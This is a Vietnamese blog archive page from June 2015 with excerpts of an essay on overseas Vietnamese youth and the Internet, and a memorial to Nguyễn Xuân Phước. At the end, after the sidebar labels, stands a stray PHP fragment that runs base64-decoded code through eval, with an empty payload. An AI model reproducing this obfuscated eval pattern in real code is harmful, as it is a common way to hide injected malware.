Archive for June 23rd, 2015

Tuổi trẻ Việt Nam hải ngoại và Cách Mạng Internet

(tham luận Đại Hội Văn Hóa và Truyền Thông – Tampa Hoa Kỳ 3-7-1998) Sau ngày cả nước rơi vào tay Cộng Sản, hàng triệu người Việt Nam như bầy chim bay lạc khắp bốn phương trời. Sự chọn lựa nơi cư trú gần như không còn là quyết

06.23.2015 | Tiểu Luận- Chính Luận |

1 Comment

Nguyễn Xuân Phước, cánh hạc vừa bay

Nguyễn Xuân Phước, cánh hạc vừa bay

Mặt hồ Irving buổi trưa im vắng chợt nghe như có tiếng chim bay. Vâng, cánh hạc Nguyễn Xuân Phước vừa từ giã chúng ta hôm nay 22 tháng 6, 2015. Nguyễn Xuân Phước, người cha thân yêu của Rebecca Bội Anh và Matthew Mạnh Tường Nguyễn, luậ

06.23.2015 | Tâm Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>